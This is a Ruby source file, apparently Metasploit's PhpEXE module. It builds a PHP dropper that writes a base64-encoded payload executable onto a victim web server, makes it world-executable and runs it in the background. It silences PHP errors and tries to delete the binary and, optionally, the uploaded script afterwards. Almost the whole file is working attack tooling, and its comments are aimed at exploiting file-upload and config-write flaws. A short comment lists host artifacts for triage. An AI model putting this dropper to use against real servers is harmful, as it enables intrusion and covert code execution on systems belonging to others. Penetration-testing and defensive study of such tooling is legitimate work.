  1. # -*- coding: binary -*-
  2. ###
  3. #
  4. # This module exposes a simple method to create a payload in an executable.
  5. #
  6. ###
module Msf
  # Mixin that wraps a Metasploit payload of any architecture in a one-line
  # PHP "dropper": the PHP writes the executable to disk, runs it and tries to
  # remove it afterwards. ARCH_PHP payloads are emitted directly instead.
  module Exploit::PhpEXE
    include Exploit::EXE
    require 'msf/core/payload'
    require 'msf/core/payload/php'
    include Payload::Php

    #
    # Generate a first-stage php payload.
    #
    # For ARCH_PHP targets, simply returns payload.encoded wrapped in <?php ?>
    # markers.
    #
    # For target architectures other than ARCH_PHP, this will base64 encode an
    # appropriate executable and drop it on the target system. After running
    # it, the generated code will attempt to unlink the dropped executable which
    # will certainly fail on Windows.
    #
    # Observable artifacts of the non-PHP branch (useful when triaging a host
    # where this dropper ran): a file with a random 8-letter alphabetic name
    # (suffixed ".exe" on Windows, where it is not cleaned up) inside
    # :writable_path or the script's working directory, set to mode 0777, plus
    # an error_reporting(0) call that silences PHP errors. The emitted PHP is
    # collapsed onto a single line with `#` comments removed.
    #
    # @param opts [Hash] generation options, see below
    # @option opts [String] :writable_path A path on the victim where we can
    #   write an executable. Uses current directory if not given.
    # @option opts [Boolean] :unlink_self Whether to call unlink(__FILE__); in
    #   the payload. Good idea for arbitrary-file-upload vulns, bad idea for
    #   write-to-a-config-file vulns
    #
    # @return [String] A PHP payload that will drop an executable for non-php
    #   target architectures
    #
    # @todo Test on Windows
    def get_write_exec_payload(opts={})
      case target_arch.first
      when ARCH_PHP
        # Native PHP payload: nothing to drop, use the encoded stage as-is.
        php = payload.encoded
      else
        # Random alphabetic basename; the directory comes from :writable_path,
        # falling back to the script's current directory.
        bin_name = Rex::Text.rand_text_alpha(8)
        if opts[:writable_path]
          bin_name = [opts[:writable_path], bin_name].join("/")
        else
          bin_name = "./#{bin_name}"
        end
        if target["Platform"] == 'win'
          bin_name << ".exe"
          # The unlink() at the end of the PHP block is not expected to succeed
          # on Windows, so the operator is told the file remains on disk.
          print_warning("Unable to clean up #{bin_name}, delete it manually")
        end
        # The executable travels inside the PHP source as base64 text.
        p = Rex::Text.encode_base64(generate_payload_exe)
        # PHP dropper: write the decoded binary, make it world-executable, run
        # it through the php_system_block helper (backgrounded with "&" except
        # on Windows so the request can return), then attempt to delete it.
        # NOTE: the lines below are part of the string literal, not Ruby code.
        php = %Q{
error_reporting(0);
$ex = "#{bin_name}";
$f = fopen($ex, "wb");
fwrite($f, base64_decode("#{p}"));
fclose($f);
chmod($ex, 0777);
function my_cmd($cmd) {
#{php_preamble}
#{php_system_block};
}
if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
my_cmd($ex . "&");
} else {
my_cmd($ex);
}
unlink($ex);
}
      end
      if opts[:unlink_self]
        # Prepend instead of appending to make sure it happens no matter
        # what the payload normally does.
        php = "@unlink(__FILE__);" + php
      end
      # Minify: drop `#` line comments, then collapse runs of blanks/tabs and
      # newlines to single spaces so the payload fits on one line.
      php.gsub!(/#.*$/, '')
      php.gsub!(/[\t ]+/, ' ')
      php.gsub!(/\n/, ' ')
      return "<?php #{php} ?>"
    end
  end
end